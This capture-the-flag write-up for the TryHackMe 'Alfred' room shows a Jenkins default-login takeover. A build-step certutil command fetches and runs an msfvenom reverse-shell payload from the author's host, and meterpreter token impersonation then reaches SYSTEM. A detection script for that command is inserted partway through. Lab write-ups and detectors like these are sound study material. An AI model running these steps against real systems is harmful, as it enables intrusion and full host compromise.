Alfred - THM - Braindump

There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.

Searching on Google, the default is admin. I tried simple combinations, and admin:admin worked.

We can modify the configuration for the existing project and insert a build command to run when building it; we can try to launch a reverse shell from it.

We can use this command in the build:

certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced.exe & Advanced.exe

where Advanced.exe is a msfvenom-generated payload to launch the reverse connection to my machine.
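A detection sketch for the build-step command above, added here and not part of the original write-up: it walks constructed Sysmon-style process-creation records, flags certutil.exe fetching a URL with -urlcache, raises severity when an ancestor process is Jenkins, and flags later execution of the fetched file. The record layout, PIDs, install paths and the "jenkins"-in-path heuristic are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records (Sysmon Event ID 1 style). PIDs, the
# Jenkins install path and the workspace path are made up for this example.
EVENTS = [
    {"pid": 100, "ppid": 4, "cmd": "java.exe -jar jenkins.war",
     "image": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe"},
    {"pid": 200, "ppid": 100, "cmd": r"cmd /c call C:\Windows\TEMP\jenkins1.bat",
     "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced.exe"},
    {"pid": 400, "ppid": 200, "cmd": "Advanced.exe",
     "image": r"C:\Program Files (x86)\Jenkins\workspace\project\Advanced.exe"},
    {"pid": 500, "ppid": 4, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -hashfile C:\Users\a\setup.msi SHA256"},  # benign use
]

URLCACHE = re.compile(r"[-/]urlcache\b", re.I)
URL = re.compile(r"https?://\S+", re.I)

def ancestors(event, by_pid):
    """Yield parent events up the process tree; stop on unknown or repeated PID."""
    seen = set()
    cur = by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield cur
        cur = by_pid.get(cur["ppid"])

def detect(events):
    """Return (rule, pid, severity) tuples for certutil downloads and their execution."""
    by_pid = {e["pid"]: e for e in events}
    alerts, fetched = [], set()
    for e in events:
        name = PureWindowsPath(e["image"]).name.lower()
        # Assumption: a Jenkins-spawned process has "jenkins" in an ancestor's image path.
        from_ci = any("jenkins" in a["image"].lower() for a in ancestors(e, by_pid))
        severity = "high" if from_ci else "medium"
        url = URL.search(e["cmd"])
        if name == "certutil.exe" and URLCACHE.search(e["cmd"]) and url:
            # Remember the file name at the end of the URL to catch its execution.
            fetched.add(url.group().rstrip('"').rsplit("/", 1)[-1].lower())
            alerts.append(("certutil_download", e["pid"], severity))
        elif name in fetched:
            alerts.append(("downloaded_file_executed", e["pid"], severity))
    return alerts
```
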

Then I used this shell to launch a reverse meterpreter, so I can use the extra help of meterpreter. I loaded PowerUp to enumerate possible privesc vectors. It says we are already local admins. I used load incognito and list_tokens -g to see if we could impersonate another user.

We can impersonate BUILTIN\Administrator: run impersonate_token "BUILTIN\Administrator" and we are NT Authority System. We still need to migrate to actually have these privileges: first run ps and then migrate to the PID of the services.exe process. We can now read root.txt in the config directory.

